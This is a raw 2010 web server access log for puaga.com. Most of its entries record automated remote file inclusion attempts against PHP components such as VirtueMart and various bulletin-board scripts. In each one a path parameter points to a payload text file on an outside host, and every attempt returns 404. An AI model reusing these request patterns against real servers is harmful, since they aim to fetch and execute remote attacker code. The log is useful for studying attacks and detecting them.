58.150.99.144 - - [21/Feb/2010:06:43:15 -0800] "GET /logs//soik/bbs///write_comment_update.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:43:30 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:43:47 -0800] "GET /logs/access_100202.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:44:02 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:44:02 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:44:02 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:44:05 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://fishcountapp.com/wp-content/upgrade/language/motd/f1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:44:06 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:44:06 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [21/Feb/2010:06:44:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.przebij.com/includes/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:44:45 -0800] "GET /logs/access_100115.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:45:30 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:45:30 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:45:30 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:45:30 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:06:45:31 -0800] "GET /logs/access_100128.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:45:48 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:46:04 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [21/Feb/2010:06:46:47 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [21/Feb/2010:06:46:47 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [21/Feb/2010:06:46:51 -0800] "GET /config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [21/Feb/2010:06:47:02 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:47:18 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:47:18 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:47:18 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:06:47:32 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:48:15 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:48:16 -0800] "GET /logs/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:48:16 -0800] "GET /logs/access_100126.log/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:48:16 -0800] "GET /logs/access_100208.log/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:48:35 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:48:35 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:48:52 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:48:56 -0800] "GET /logs/access_100124.log%20%20//bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:49:01 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:49:04 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:49:04 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:49:04 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:49:34 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:49:34 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:49:34 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:49:34 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:49:48 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:49:58 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:50:09 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:50:09 -0800] "GET /logs/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:50:09 -0800] "GET /logs/access_100119.log%20%20/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:06:50:09 -0800] "GET /logs/access_100126.log%20%20/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:06:50:30 -0800] "GET /logs/access_100123.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://fishcountapp.com/wp-content/upgrade/language/motd/f1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:31 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:31 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:06:50:33 -0800] "GET /skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:06:50:33 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:06:50:33 -0800] "GET /logs/access_100119.log//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:06:50:33 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:34 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:34 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:34 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:34 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:38 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:38 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:06:50:38 -0800] "GET /logs/access_100206.log//index.php?option=com_search&mosConfig.absolute.path=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:50:48 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:48 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:50:48 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:50:49 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:50 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:52 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:52 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:52 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:52 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:53 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:53 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:53 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:53 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:50:57 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:03 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:04 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:04 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:04 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.115.111.242 - - [21/Feb/2010:06:51:06 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.puaga.com"
208.115.111.242 - - [21/Feb/2010:06:51:06 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:08 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:08 -0800] "GET /logs/access_100127.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:13 -0800] "GET ///////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:13 -0800] "GET /logs/access_100124.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:13 -0800] "GET /logs////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:13 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:14 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:21 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:22 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:25 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:31 -0800] "GET /logs/access_100204.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:33 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:34 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:06:51:37 -0800] "GET /logs/access_100203.log%20%20////////////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:06:51:39 -0800] "GET /logs/access_100119.log//bbs/write_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
